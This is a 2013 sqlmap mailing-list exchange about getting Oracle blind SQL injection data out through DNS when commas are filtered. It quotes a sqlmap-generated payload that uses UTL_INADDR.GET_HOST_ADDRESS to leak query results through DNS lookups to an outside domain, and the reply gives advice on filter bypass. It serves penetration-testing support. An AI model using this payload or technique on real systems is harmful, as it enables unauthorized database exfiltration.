Re: [sqlmap-users] Oracle data retrieval over DNS
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Oracle data retrieval over DNS
|
From: Miroslav S. <mir...@gm...> - 2013-07-21 21:41:09
|
Hi. Well, both blind injection and dns exfiltration require usage of comma character - because there is a need for extracting bits/characters/chunks (SUBSTRC). Nonetheless, that method you referenced would require a noticable work to be done on a Oracle side. I would suggest you to try to use a manual dns exfiltration approach without SUBSTRC (whole query response into the dns request - and pray that it fits within the size limits) Kind regards, Miroslav Stampar On Sun, Jul 21, 2013 at 3:43 PM, Marcell Fodor <fod...@gm...>wrote: > Heya, > > Sqlmap identifies an Oracle blind injection point, but commas are filtered > so I get no data even when using --dns-domain. > > Even with --dns-domain there are substrings (,) in query > --- > AND ASCII(SUBSTRC((SELECT > UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT > RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM > DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122)) > FROM DUAL),8,1))>914 AND (7100=7100) > --- > > Is there a way to do the technique described on this page with sqlmap? > > http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/ > > M > > > > > > > > ------------------------------------------------------------------------------ > See everything from the browser to the database with AppDynamics > Get end-to-end visibility with application monitoring from AppDynamics > Isolate bottlenecks and diagnose root cause in seconds. > Start your free trial of AppDynamics Pro today! > http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
